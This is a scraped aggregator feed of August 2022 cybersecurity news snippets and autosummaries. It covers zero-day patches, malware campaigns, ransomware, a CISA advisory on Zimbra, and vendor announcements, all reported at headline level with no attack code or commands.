Most of these are located in China and the United States, while Vietnam, the UK, Ukraine, Thailand, South Africa, France, the Netherlands, and Romania all count above 2,000 vulnerable endpoints. "Tackling the dangers of internal communications: What can companies do? In this interview for Help Net Security, Devin Redmond, CEO at Theta Lake, talks about the risk of internal communications and what companies can do to keep themselves safe. How government CISOs tackle digital transformation initiatives In this interview for Help Net Security, Dan Tucker, Senior VP at Booz Allen, and leader of the firm’s cloud and data engineering solutions for citizen services, talks about … More
The post Week in review: Apple fixes exploited zero-days, 1,900 Signal users exposed, Amazon Ring app vuln appeared first on Help Net Security.
"Autosummary:
How government CISOs tackle digital transformation initiatives In this interview for Help Net Security, Dan Tucker, Senior VP at Booz Allen, and leader of the firm’s cloud and data engineering solutions for citizen services, talks about government digital transformation efforts, security challenges, and offers tips for CISOs. Why smart factories need to prioritize cybersecurity In this Help Net Security video, Aarthi Krishna, Global Head of Intelligent Industry Security at Capgemini, provides an overview of the cybersecurity issues smart factories have to deal with, and offers steps to help organizations better prepare, prevent and mitigate a variety of attacks. "A new Grandoreiro banking malware campaign is targeting organizations in Mexico and Spain, Zscaler reported. Zscaler ThreatLabz researchers observed a Grandoreiro banking malware campaign targeting organizations in the Spanish-speaking nations of Mexico and Spain. Grandoreiro is a modular backdoor that supports the following capabilities: Keylogging Auto-Updation for newer versions and modules Web-Injects and restricting access to specific […]
The post Grandoreiro banking malware targets Mexico and Spain appeared first on Security Affairs.
"Autosummary:
Grandoreiro is a modular backdoor that supports the following capabilities: Keylogging Auto-Updation for newer versions and modules Web-Injects and restricting access to specific websites Command execution Manipulating windows Guiding the victim’s browser to a certain URL C2 Domain Generation via DGA (Domain Generation Algorithm) "Threat actors have exploited a zero-day vulnerability in the General Bytes Bitcoin ATM servers to steal BTC from multiple customers. Threat actors have exploited a zero-day flaw in General Bytes Bitcoin ATM servers that allowed them to hijack transactions associated with deposits and withdrawal of funds. GENERAL BYTES is the world’s largest Bitcoin, Blockchain, and […]
The post Threat actors are stealing funds from General Bytes Bitcoin ATM appeared first on Security Affairs.
"Autosummary:
The attackers exploited the issue to create an admin user account via the CAS admin panel “The attacker was able to create an admin user remotely via CAS administrative interface via a URL call on the page that is used for the default installation on the server and creating the first administration user. "Threat actors compromise WordPress sites to display fake Cloudflare DDoS protection pages to distribute malware. DDoS Protection pages are associated with browser checks performed by WAF/CDN services which verify if the site visitor is a human or a bot. Recently security experts from Sucuri, spotted JavaScript injections targeting WordPress sites to display fake DDoS Protection pages […]
The post Fake DDoS protection pages on compromised WordPress sites lead to malware infections appeared first on Security Affairs.
"Autosummary:
Website owners are recommended to: Keep all software on your website up to date Use strong passwords Use 2FA on your administrative panel Place your website behind a firewall service while below are the recommendations for regular website visitors: Make sure your computer is running a robust antivirus program Place 2FA on all important logins (such as your bank, social media) "Autosummary:
"Autosummary:
The line-up covers ethical hacking with Python 3, NMAP, OWASP ZAP, Burp Suite, and other top tools. "Autosummary:
"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 7 new flaws to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added seven new flaws to its Known Exploited Vulnerabilities Catalog, including a critical SAP security vulnerability tracked as CVE-2022-22536. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday […]
The post CISA added 7 new flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
CISA also added the following issues to the Catalog: CVE-2022-32893 – Apple iOS and macOS contain an out-of-bounds write vulnerability that could allow for remote code execution when processing malicious crafted web content. "Autosummary:
The threat actors then exploited the bug to add a default admin user named "gb" to the CAS and modified the "buy" and "sell" crypto settings and "invalid payment address" to use a cryptocurrency wallet under the hacker"s control. "Autosummary:
Raccoon 2.0 targets passwords, cookies, auto-fill data, and credit cards saved on web browsers, a wide range of cryptocurrency wallets, and it"s also capable of performing file exfiltration and taking screenshots of the victim"s desktop. "Tenacity Cloud launched agentless, automated and self-directed activation capability with immediate deployment within its platform. Within seconds and just a few clicks, mid-market and enterprise IT organizations can set up an account and integrate their environment with AWS. Within minutes, asset data populates and users begin to uncover misconfigurations, cost overruns and compliance issues created by errors at the configuration level. Tenacity’s platform gives users immediate and total visibility into their entire AWS and Azure … More
The post Tenacity platform enhancements provide visibility into entire AWS and Azure cloud infrastructure appeared first on Help Net Security.
"Autosummary:
Our mission is to create the fastest and easiest way to reach cloud security, and we’re proud to be delivering unprecedented agility and speed to observability through an easy-to-use and cost-effective platform.” "Active adversaries are increasingly exploiting stolen session cookies to bypass multi-factor authentication (MFA) and gain access to corporate resources, according to Sophos. In some cases, the cookie theft itself is a highly targeted attack, with adversaries scraping cookie data from compromised systems within a network and using legitimate executables to disguise the malicious activity. Once the attackers obtain access to corporate web-based and cloud resources using the cookies, they can use them for further exploitation … More
The post Exploiting stolen session cookies to bypass multi-factor authentication (MFA) appeared first on Help Net Security.
"Autosummary:
For example, services can shorten the lifespan of cookies, but that means users must re-authenticate more often, and, as attackers turn to legitimate applications to scrape cookies, companies need to combine malware detection with behavioral analysis.” "Imperva releases data showing that 25% of all gambling sites were hit with DDoS attacks executed by botnets in June. As the Wimbledon tennis tournament began at the end of June, DDoS attacks increased and impacted 10% of gambling sites. This continues a damaging pattern for the industry with 40% of gambling sites suffering attacks in the last 12 months, 80% of whom were hit multiple times. Overall, the number of application layer DDoS attacks … More
The post Cybercriminals are using bots to deploy DDoS attacks on gambling sites appeared first on Help Net Security.
"Autosummary:
“For gambling firms, even an hour of downtime can equate to significant amounts of lost revenue,” says Yuriy Arbitman, Data Scientist, Imperva. "Autosummary:
"Cisco addressed a high-severity escalation of privilege vulnerability (CVE-2022-20871) in AsyncOS for Cisco Secure Web Appliance. Cisco Secure Web Appliance (formerly Secure Web Appliance (WSA)) offers protection from malware and web-based attacks and provides application visibility and control. Cisco has addressed a high-severity escalation of privilege vulnerability, tracked as CVE-2022-20871, that resides in the web management interface of AsyncOS for Cisco Secure Web […]
The post Cisco fixes High-Severity bug in Secure Web Appliance appeared first on Security Affairs.
"Autosummary:
“A vulnerability in the web management interface of Cisco AsyncOS for Cisco Secure Web Appliance, formerly Cisco Web Security Appliance (WSA), could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root.” "Estonia announced to have blocked a wave of cyber attacks conducted by Russian hackers against local institutions. Undersecretary for Digital Transformation Luukas Ilves announced that Estonia was hit by the most extensive wave of DDoS attacks it has faced since 2007. The DDoS attacks targeted both public institutions and the private sector. The Pro-Russia hacker […]
The post Estonia blocked cyberattacks claimed by Pro-Russia Killnet group appeared first on Security Affairs.
"Autosummary:
E-services created under this initiative include i-Voting, e-Tax Board, e-Business, e-Banking, e-Ticket, e-School, University via internet, the E-Governance Academy, as well as the release of several mobile applications. "Autosummary:
CVE Number Vulnerability Title CVE-2017-15944 Palo Alto Networks PAN-OS Remote Code Execution Vulnerability CVE-2022-21971 Microsoft Windows Runtime Remote Code Execution Vulnerability CVE-2022-26923 Microsoft Active Directory Domain Services Privilege Escalation Vulnerability CVE-2022-2856 Google Chrome Intents Insufficient Input Validation Vulnerability CVE-2022-32893 Apple iOS and macOS Out-of-Bounds Write Vulnerability CVE-2022-32894 Apple iOS and macOS Out-of-Bounds Write Vulnerability CVE-2022-22536 SAP Multiple Products HTTP Request Smuggling VulnerabilityIf an intent contains any extras or a data URI and it targets another browser, Google Chrome would open that browser with that URL without prompting:https://t.co/iiDhLShhJv — Hossein Lotfi (@hosselot) August 18, 2022 Microsoft fixed the CVE-2022-21971 remote code execution vulnerability in the February 2022 Patch Tuesday, but no details are available about how it is being exploited in the wild. "Autosummary:
Also known as APT-C-35 and Viceroy Tiger, the Donot Team is known for setting its sights on defense, diplomatic, government, and military entities in India, Pakistan, Sri Lanka, and Bangladesh, among others at least since 2016. "Autosummary:
The news of yet more vulnerabilities from top tech vendors being barraged by threat actors demonstrates that despite the best efforts from top-tier tech companies to address perennial security issues in their software, it remains an uphill battle, noted Andrew Whaley, senior technical director at Promon, a Norwegian app security company. "US CISA added a critical SAP flaw to its Known Exploited Vulnerabilities Catalog after its details were disclosed at the Black Hat and Def Con conferences. The US Cybersecurity and Infrastructure Security Agency (CISA) added a critical SAP vulnerability, tracked as CVE-2022-22536, to its Known Exploited Vulnerabilities Catalog a few days after researchers shared details […]
The post CISA added SAP flaw to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
In February, security researchers from Onapsis, in coordination with SAP, published a Threat Report that provides technical details about three critical vulnerabilities (CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533) that affected Internet Communication Manager (ICM), which is a core component of SAP business applications. "Autosummary:
The backdoor capabilities of the malware on the host include: Keylogging Auto-Updation for newer versions and modules Web-Injects and restricting access to specific websites Command execution Manipulating windows Guiding the victim"s browser to a specific URL C2 Domain Generation via DGA (Domain Generation Algorithm) Imitating mouse and keyboard movements Outlook The recent campaign indicates that Grandoreiro"s operators are interested in conducting highly-targeted attacks instead of sending large volumes of spam emails to random recipients. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @LawrenceAbrams, @PolarToffee, @BleepinComputer, @Seifreed, @jorntvdw, @fwosar, @serghei, @struppigel, @FourOctets, @demonslay335, @malwrhunterteam, @Ionut_Ilascu, @malwareforme, @VK_Intel, @DanielGallagher, @juanbrodersen, @AlvieriD, @Cyberknow20, @Intel_by_KELA, @MauroEldritch, @luisezegarra, @Cleafy, and @pcrisk. "Categories: News Tags: Microsoft Tags: USB stick Tags: tech support scam Tags: scammers Tags: Office 365 Tags: fake Tags: phone call We take a look at a Microsoft warning related to tech support scammers sending out bogus USB sticks in the mail. |
The post Tech support scammers target Microsoft users with fake Office 365 USB sticks appeared first on Malwarebytes Labs.
"Autosummary:
In this particular instance, the fake Microsoft outfit went with the “You have a virus, call us” approach.Whether a stranger has given you it in the street as part of a giveaway, or you found it on the floor, or even received it at an event, there’s an element of risk involved. "Redpoint Cybersecurity has named David Duncan as its new Vice President of Cyber Operations. As leader of the Cyber Operations team, David will have oversight over the Breach Response group as well as the Redpoint Labs team. Redpoint’s Breach Response has handled the most complex and extensive ransomware and other breaches, and the Redpoint Labs group houses Redpoint’s Threat Mitigation Group as well as its DevOps team. Prior to his newly expanded role, David was … More
The post Redpoint Cybersecurity names David Duncan as VP of Cyber Operations appeared first on Help Net Security.
"Autosummary:
"In many ways, IoT has made our lives easier. We are technologically connected in ways we never thought possible. But organizations need to be aware of the cybersecurity blind spots generated by the prevalence of IoT technology, because connected devices are opening virtual doors into organizations’ networks. The enterprise IoT cybersecurity blind spots According to Forrester, over 60% of enterprise cyberattacks originate from the trust organizations place in their partner or vendor, and vulnerable devices … More
The post IoT: The huge cybersecurity blind spot that’s costing millions appeared first on Help Net Security.
"Autosummary:
The enterprise IoT cybersecurity blind spots According to Forrester, over 60% of enterprise cyberattacks originate from the trust organizations place in their partner or vendor, and vulnerable devices ending up in the end-product or system ecosystem – which is where the blind spot comes in.As an industry-recognized seal of approval, vendors and partners can be sure that the products they are working with meet the high standards they need, and create a strong, trusting relationship between them. "Recent Capgemini research revealed that the vast majority of organizations do not have device visibility at their smart factory locations. The use of legacy machinery, designed before cybersecurity was a key element, has opened networks to attack. In this Help Net Security video, Aarthi Krishna, Global Head of Intelligent Industry Security at Capgemini, provides an overview of the cybersecurity issues smart factories have to deal with, and offers steps to help organizations better prepare, prevent … More
The post Why smart factories need to prioritize cybersecurity appeared first on Help Net Security.
"Autosummary:
"In this interview for Help Net Security, Dan Tucker, Senior VP at Booz Allen, and leader of the firm’s cloud and data engineering solutions for citizen services, talks about government digital transformation efforts, security challenges, and offers tips for CISOs. What are the most significant security challenges governments face when going through digital transformation? With respect to security, one of the most prevalent challenges for federal government agencies is striking the right balance between the … More
The post How government CISOs tackle digital transformation initiatives appeared first on Help Net Security.
"Autosummary:
Similar to any complex organizational shift, the chance of success rises and falls less with technology, and more so with the foundational components of early stakeholder buy-in, well understood objectives, clear roles and responsibilities, timely and data-centric communications, and continuous feedback and learning. "Raytheon Blackbird Technologies has released NexGenTrac, or NGT, Watch and NexGen Global SIM, a wearable device and global data service that provides situational awareness and secure communications. “For government, military and other organizations that need to meet safety protocols for their globally deployed workforce, NexGenTrac Watch provides global situational awareness, secure communications and personnel accountability in the convenience of wearable device” said Troy Smith, director of Raytheon Blackbird Technologies. NGT Watch uses the proprietary global … More
The post Raytheon launches secure watch and data service for government and military employees appeared first on Help Net Security.
"Autosummary:
“For government, military and other organizations that need to meet safety protocols for their globally deployed workforce, NexGenTrac Watch provides global situational awareness, secure communications and personnel accountability in the convenience of wearable device” said Troy Smith, director of Raytheon Blackbird Technologies. "Autosummary:
"Apple has released security updates for iOS, iPadOS, and macOS Monterey to fix CVE-2022-32894 and CVE-2022-32893, two code execution vulnerabilities exploited by attackers in the wild. About the vulnerabilities (CVE-2022-32894, CVE-2022-32893) CVE-2022-32894 is out-of-bounds write issue in the operating systems’ kernel that can be exploited by a malicious application to execute arbitrary code with kernel privileges (and take control over the entire system) CVE-2022-32893 is out-of-bounds write issue in WebKit – Apple’s browser engine that … More
The post Apple fixes exploited zero-days: Update your devices! (CVE-2022-32894, CVE-2022-32893) appeared first on Help Net Security.
"Autosummary:
"Apple addressed two zero-day vulnerabilities, exploited by threat actors, affecting iOS, iPadOS, and macOS devices. Apple this week released security updates for iOS, iPadOS, and macOS platforms to address two zero-day vulnerabilities exploited by threat actors. Apple did not share details about these attacks. The two flaws are: CVE-2022-32893 – An out-of-bounds issue in WebKit which. An attacker can trigger the […]
The post Apple fixed two new zero-day flaws exploited by threat actors appeared first on Security Affairs.
"Autosummary:
"Exploit code for a critical vulnerability affecting networking devices using Realtek RTL819x system on a chip released online. The PoC exploit code for a critical stack-based buffer overflow issue, tracked as CVE-2022-27255 (CVSS 9.8), affecting networking devices using Realtek’s RTL819x system on a chip was released online. The issue resides in the Realtek’s SDK for […]
The post PoC exploit code for critical Realtek RCE flaw released online appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "A vulnerability in the Android version of the Ring app, which is used to remotely manage Amazon Ring outdoor (video doorbell) and indoor surveillance cameras, could have been exploited by attackers to extract users’ personal data and device’s data, including geolocation, address, and recordings. The vulnerability was discovered by Checkmarx researchers, who went one step further and demonstrated how an attacker could later analyze huge numbers of recordings with the help of computer vision technology, … More
The post Vulnerability in Amazon Ring app allowed access to private camera recordings appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Around the clock coverage While some companies still use annual pentesting as their only line of defence, many are starting to see how frequently new threats arise and the value of continuous, automated threat scanning.It"s a hands-on, in-depth test to evaluate security controls across a variety of systems, including web application, network and cloud environments. "Autosummary:
Chen reflects that investigators discovered something even weirder: "Playing the music video on one laptop caused a laptop sitting nearby to crash, even though that other laptop wasn"t playing the video!" "It turns out that the song contained one of the natural resonant frequencies for the model of 5400 rpm laptop hard drives that they and other manufacturers used. "Autosummary:
"It can also deliver "add-on packages" such as additional malicious payloads, benign decoy documents, and executables," cybersecurity firm Secureworks said in a Wednesday report. "Autosummary:
In July, the company fixed an actively exploited heap buffer overflow flaw tracked as CVE-2022-2294 in WebRTC, the engine that gives Chrome its real-time communications capability, while in May it was a separate buffer overflow flaw tracked as CVE-2022-2294 and under active attack that got slapped with a patch. "A new version of the BlackByte ransomware appeared in the threat landscape, version 2.0 uses extortion techniques similar to LockBit ones. BlackByte ransomware Version 2.0 appeared in the threat landscape after a short break, the latest version has a new data leak site. It is interesting to note that the group introduced some novelties in the […]
The post BlackByte ransomware v2 is out with new extortion novelties appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
The most popular of these, having 100k downloads each, are the following: Walls light – Wallpapers Pack (gb.packlivewalls.fournatewren) Big Emoji – Keyboard 5.0 (gb.blindthirty.funkeyfour) Grand Wallpapers – 3D Backdrops 2.0 (gb.convenientsoftfiftyreal.threeborder) Engine Wallpapers (gb.helectronsoftforty.comlivefour) Stock Wallpapers (gb.fiftysubstantiated.wallsfour) EffectMania – Photo Editor 2.0 (gb.actualfifty.sevenelegantvideo) Art Filter – Deep Photoeffect 2.0 (gb.crediblefifty.editconvincingeight) Fast Emoji Keyboard APK (de.eightylamocenko.editioneights) Create Sticker for Whatsapp 2.0 (gb.convincingmomentumeightyverified.realgamequicksix) Math Solver – Camera Helper 2.0 (gb.labcamerathirty.mathcamera) "Autosummary:
"Categories: Threat Intelligence High detections of hacking tools for the Business Services industry shows that attackers likely sought to infect businesses and install backdoors for future access to their customers. |
The post Business Services industry targeted across the country for backdoor access appeared first on Malwarebytes Labs.
"Autosummary:
A subsequent spike of this threat in August 2021 coincides with three major attacks, likely achieved because of the success of CVE-2021-21551.These were the Kaseya Breach which spread REvil to hundreds of networks, the ransomware attack on insurance firm Accenture, which demanded $50 million in payment, and the T-Mobile data breach which exposed the information of 50 million people. "Categories: Threat Intelligence In the first quarter of 2021, the US public sector dealt with heavy-hitting breaches against local, federal, and state government networks. |
The post Attackers waited until holidays to hit US government appeared first on Malwarebytes Labs.
"Autosummary:
Despite that, a series of unspecific exploits battered the industry in late October, spiking in November and into December, when the Maryland Department of Health, the Virginia State Government and the Hawaii Timekeeping Services were all breached and disrupted, some due to ransomware, others to stolen data. So, by knowing the trends of government organization attacks, we recommend not reducing security staff during the holidays, if anything, you need to have more eyes on the network, looking for anything that might stand out as odd when the network is meant to be relatively quiet. "Categories: Business According to Verizon, 82 percent of data breaches in 2021 involved the human element—with phishing attacks making up over 60 percent of these. But Malwarebytes DNS filtering can help you prevent a large swath of phishing attacks. |
The post How IT teams can prevent phishing attacks with Malwarebytes DNS filtering appeared first on Malwarebytes Labs.
"Autosummary:
Posted: August 18, 2022 by According to Verizon, 82 percent of data breaches in 2021 involved the human element—with phishing attacks making up over 60 percent of these.And if it ain’t broke, don’t fix it: threat actors have only continued to use phishing to attack businesses in 2022, with the Anti-Phishing Working Group (APWG) recording a 15 percent increase in phishing attacks in Q1 2022 compared to Q4 2021. "Categories: Exploits and vulnerabilities Categories: News Tags: macOS Tags: iOS Tags: CVE-2022-32894 Tags: CVE-2022-32893 Tags: kernel privileges Tags: WebKit Tags: actively exploited Tags: watering hole Tags: exploit kit Apple has released emergency security updates to fix two zero-day vulnerabilities previously exploited by attackers to hack iPhones, iPads, or Macs. |
The post Urgent update for macOS and iOS! Two actively exploited zero-days fixed appeared first on Malwarebytes Labs.
"Autosummary:
This code could be used to leverage CVE-2022-32894 to obtain kernel privileges Mitigation Users are under advice to implement the updates as soon as possible, by upgrading to: iOS 15.6.1 iPadOS 15.6. "TXOne Networks has entered into definitive agreements in connection with its Series B financing with total investment proceeds of $70 million. The latest capital injection will be used to expand TXOne Networks’ global presence and defend industry verticals worldwide against cybersecurity threats to industrial control systems (ICS). The new funding round was led by TGVest Capital ($20 million), with participation from KAiA Capital, CDIB Capital Group, CDIB-Innolux L.P., MediaTek, Ta Ya Electric Wire & Cable, … More
The post TXOne Networks raises $70 million to defend industry verticals against cybersecurity threats appeared first on Help Net Security.
"Autosummary:
The new funding round was led by TGVest Capital ($20 million), with participation from KAiA Capital, CDIB Capital Group, CDIB-Innolux L.P., MediaTek, Ta Ya Electric Wire & Cable, Ta Ya Venture Capital, Simplo Technology Group, CHT Security Corporation and Ash Tower Limited, as well as Steven Pan, Silks Hotel Group Chair, and Chun-I Wu, TAYIH Group Chair. "Apple released Safari 15.6.1 for macOS Big Sur and Catalina to address a zero-day vulnerability actively exploited in the wild. Safari 15.6.1 for macOS Big Sur and Catalina addressed an actively exploited zero-day vulnerability tracked as CVE-2022-32893. The flaw is an out-of-bounds write issue in WebKit and the IT giant fixed it with improved bounds […]
The post Safari 15.6.1 addresses a zero-day flaw actively exploited in the wild appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Update 8/21/22: LockBit leaks alleged Entrust data LockBit began leaking Entrust"s data Friday evening, first sharing screenshots of some of the allegedly stolen data, with the threat actors saying they would leak further data later that evening. "In this Help Net Security video, Brian Contos, CSO at Phosphorus Cybersecurity, discusses how most companies consider IoT threats to be limited in scope. In actuality, a growing number of sophisticated adversaries are realizing the true value of IoT as an easy initial breach point to get access to the corporate network. These devices also enable them to achieve long-term persistence through network footholds that will avoid detection and survive remediation.
The post How attackers are exploiting corporate IoT appeared first on Help Net Security.
"Autosummary:
"Response-based attacks targeting corporate inboxes have climbed to their highest volume since 2020, representing 41 percent of all email-based scams targeting employees, during Q2 of this year. This is according to the latest Quarterly Threat Trends & Intelligence Report from Agari and PhishLabs. From April through June, researchers analyzed hundreds of thousands of phishing and social media attacks targeting enterprises and their employees. The report uses the data from those attacks to present key trends … More
The post Response-based attacks make up 41% of all email-based scams appeared first on Help Net Security.
"Autosummary:
A response-based threat is a social-engineering attack that relies on victims responding through a chosen channel of communication, and comprises methods such as phishing (targeting victims over email), vishing/smishing (over a voice call or an SMS text message) and advance-fee fraud where victims are tricked into sending an upfront-fee in exchange for a larger sum of money – also known as a 419 or Nigerian scam. "Autosummary:
"The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware working also on Intel and M1 chipsets. ESET researchers continue to monitor a cyberespionage campaign, tracked as “Operation In(ter)ception,” that has been active at least since June 2020. The campaign targets employees working in the aerospace and military sectors and leverages […]
The post North Korea-linked APT targets Job Seekers with macOS malware appeared first on Security Affairs.
"Autosummary:
IoCs: FE336A032B564EEF07AFB2F8A478B0E0A37D9A1A6C4C1E7CD01E404CC5DD2853 (Extractor) 798020270861FDD6C293AE8BA13E86E100CE048830F86233910A2826FACD4272 (FinderFontsUpdater) 49046DFEAEFC59747E45E013F3AB5A2895B4245CFAA218DD2863D86451104506 (safarifontagent) … 6/7 — ESET research (@ESETresearch) August 16, 2022 Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, North Korea) Share this... "Autosummary:
"Autosummary:
"Autosummary:
In a thread on Twitter, they note that the malware drops three files: the bundle FinderFontsUpdater.app the downloader safarifontagent a decoy PDF called “Coinbase_online_careers_2022_07” PDF (same as the Windows malware) A similar campaign targeting macOS users and attributed to Lazarus was identified last year. "Autosummary:
Bypassing Android 13"s restricted setting feature Source: ThreatFabric Bypassing Android"s Restricted settings In a new report released today, Threat Fabric has discovered a new Android malware dropper that is already adding new features to bypass the new Restricted setting security feature. "Autosummary:
"Autosummary:
Similarities to Previous Malware The malware is similar to a sample discovered by ESET in May, which also included a signed executable disguised as a job description, was compiled for both Apple and Intel, and dropped a PDF decoy, researchers said. "Researchers have discovered a previously undocumented Android dropper, dubbed BugDrop, that’s still under development. Recently, researchers from ThreatFabric discovered a previously undetected Android dropper, dubbed BugDrop, which is under active development and was designed to bypass security features that will be implemented in the next release of the Google OS. The experts noticed something unusual in the […]
The post Bugdrop dropper includes features to circumvent Google’s security Controls appeared first on Security Affairs.
"Autosummary:
“Once granted, while showing a loading screen, the dropper initiates a connection with its onion.ws C2, which relies on the TOR protocol, obtaining back its configuration and the URL of the payload to download and install.” reads the analysis of the experts. "Google addressed a dozen vulnerabilities in the Chrome browser, including the fifth Chrome zero-day flaw exploited this year. Google this week released security updates to address a dozen vulnerabilities in its Chrome browser for desktops including an actively exploited high-severity zero-day flaw in the wild. The actively exploited flaw, tracked as CVE-2022-2856, is an Insufficient validation […]
The post Google fixed a new Chrome Zero-Day actively exploited in the wild appeared first on Security Affairs.
"Autosummary:
Heap buffer overflow in the Web Real-Time Communications (WebRTC) component CVE-2022-1364 (April 14) – type confusion issue that resides in the V8 JavaScript engine CVE-2022-1096 – (March 25) – type Confusion in V8 JavaScript engine CVE-2022-0609 – (February 14) – use after free issue that resides in the Animation component. "Autosummary:
"Autosummary:
The first binary, ZYXMN.exe, is used to steal information from Google Chrome, Chromium, Microsoft Edge, Firefox, and Opera, including stored passwords, browser history, cookies, and search history. "Autosummary:
Seven zero-days patched by Apple this year In March, Apple patched two more zero-day bugs that were used in the Intel Graphics Driver (CVE-2022-22674) and AppleAVD (CVE-2022-22675) that could also be used to execute code with Kernel privileges. "Categories: News Categories: Social engineering Not all phishing campaigns are after your bank details. In the case of the Twilio breach, attackers were after three particular Signal accounts. |
The post Nearly 2,000 Signal users affected by Twilio phishing attack appeared first on Malwarebytes Labs.
"Autosummary:
However, Signal reassured users that the attacker could not gain access to "message history, contact lists, profile information, whom they"d blocked, and other personal data" associated with the account. "Categories: Exploits and vulnerabilities Categories: News Tags: 104.0.5112.101 Tags: Google Tags: Chrome Tags: CVE-2022-2852 Tags: CVE-2022-2856 Tags: CVE-2022-2854 Tags: CVE-2022-2853 Tags: UAF Tags: heap buffer overflow Google issued an update that includes 11 security fixes. One of the vulnerabilities is labeled as “Critical” and one of the vulnerabilities that is labeled as “High” exists in the wild. |
The post Update Chrome now! Google issues patch for zero day spotted in the wild appeared first on Malwarebytes Labs.
"Autosummary:
How to protect yourself The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. Vulnerabilities Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. "Airiam has acquired Vantage Point Solutions Group. The addition of Vantage Point Solutions Group extends Airiam’s reach as a national cybersecurity provider to small to medium-sized enterprises (SMEs). “Airiam is thrilled to support Vantage Point Solutions Group’s customers with our world-class line of AirProducts and welcome their talented employees into the Airiam family,” said Ohad Jehassi, Airiam’s CEO. “In addition to enhancing the MSP services they already receive, customers will now have a wider selection … More
The post Airiam acquires Vantage Point Solutions to assist SMEs with cybersecurity and MSP support appeared first on Help Net Security.
"Autosummary:
“In addition to enhancing the MSP services they already receive, customers will now have a wider selection of services, including a managed security service provider (MSSP), managed detection and response (MDR), recovery, compliance services, digital transformation, and consulting.”, Jehassi continued. "Veracode has launched the Veracode Velocity Partner Program. The objective of the program is to enable partners to grow their security practice around Veracode’s cloud-native Continuous Software Security Platform, offering opportunities to accelerate deal closure, expand market share, and grow revenue. The program’s integrated features include demand-generation campaigns aligned to key security initiatives, on-demand sales and technical enablement tools, and a role-based partner training and certification program. Partners that play a critical role in helping … More
The post Veracode launches Velocity Partner Program to help customers with security and development challenges appeared first on Help Net Security.
"Autosummary:
Level 1- Sprint Partners: All Veracode partners begin at this level and have access to tools, including marketing campaigns and on-demand programs, training and certifications, automatic subscriptions to all partner communications, and online resources via the Partner Community. “Utilizing Veracode’s integrated features, such as training and certification, new demand-generation offerings, and tools and products via the broader marketplace helps us deliver better results for our clients.”, Dubik continued. "Autosummary:
" Justicia Córdoba"s website is suffering an outage Source: BleepingComputer Attack linked to Play ransomware While the Judiciary has not disclosed details of the attack, journalist Luis Ernest Zegarra tweeted that they were hit by ransomware that appends the ".Play" extension to encrypted files. "Autosummary:
Symantec, a division of Broadcom Software, attributed the malicious campaign to a threat actor tracked Shuckworm, also known as Actinium, Armageddon, Gamaredon, Primitive Bear, and Trident Ursa. "Russia-linked Gamaredon APT group targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad, Symantec warns. The Computer Emergency Response Team of Ukraine (CERT-UA) confirmed the ongoing cyber espionage campaign. Symantec and TrendMicro first discovered the Gamaredon […]
The post Russia-linked Gamaredon APT continues to target Ukraine appeared first on Security Affairs.
"Autosummary:
Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad, Symantec warns. "Autosummary:
Dubbed "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider Electric, GE, B&R, Xinje, OVARRO, and Emerson. "Autosummary:
SafeUTM has flexible integration scenarios - it supports VMware, Microsoft Hyper-V, VirtualBox, KVM, Citrix XenServer hypervisors, and monitoring systems, such as Zabbix agent, SNMP, DLP (via ICAP), & Microsoft Active Directory.It prevents intrusion, filters content, controls apps, has an anti-virus traffic inspection, secure VPN, reporting and more. "Autosummary:
" Primary targets include defense and intelligence consulting companies, non-governmental organizations (NGOs) and intergovernmental organizations (IGOs), think tanks, and higher education entities located in the U.S. and the U.K., and to a lesser extent in the Baltics, the Nordics, and the Eastern Europe. "Autosummary:
However, by performing a classic heap overflow attack, they were able to “completely compromise the Tencent soter platform,” allowing much greater power to, for example, sign fake payment packages. Using a regular, unprivileged Android application, they were able to communicate with the trusted soter app via “SoterService,” an API for managing soter keys.Within their own format, however, was a flaw: an absence of version control, without which “an attacker can transfer an old version of a trusted app to the device and use it to overwrite the new app file.” "Actions for ZCS administrators to take today to mitigate malicious cyber activity:
• Patch all systems and prioritize patching known exploited vulnerabilities.
• Deploy detection signatures and hunt for indicators of compromise (IOCs).
• If ZCS was compromised, remediate malicious activity.
The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are publishing this joint Cybersecurity Advisory (CSA) in response to active exploitation of multiple Common Vulnerabilities and Exposures (CVEs) against Zimbra Collaboration Suite (ZCS), an enterprise cloud-hosted collaboration software and email platform. CVEs currently being exploited against ZCS include:
Cyber threat actors may be targeting unpatched ZCS instances in both government and private sector networks. CISA and the MS-ISAC strongly urge users and administrators to apply the guidance in the Recommendations section of this CSA to help secure their organization’s systems against malicious cyber activity. CISA and the MS-ISAC encourage organizations who did not immediately update their ZCS instances upon patch release, or whose ZCS instances were exposed to the internet, to assume compromise and hunt for malicious activity using the third-party detection signatures in the Detection Methods section of this CSA. Organizations that detect potential compromise should apply the steps in the Incident Response section of this CSA.
Autosummary:
